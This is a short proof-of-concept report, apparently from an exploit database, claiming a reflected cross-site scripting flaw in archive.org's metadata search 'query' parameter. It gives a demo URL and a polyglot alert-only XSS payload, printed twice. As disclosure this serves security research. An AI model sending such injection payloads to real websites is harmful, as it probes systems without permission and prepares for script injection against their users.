#Exploit Title : archive.org XSS #Date : 2020/3/29 #Exploit Author : AmirAli Sadeghi Tamiz #Tested on : win10 #Demo : https://archive.org/search.php?query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> #POC: 1- go to archive.org 2-go to meta data search (archive.org/search.php?query=) 3-Parameter query is vulnerable 4-payload is: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>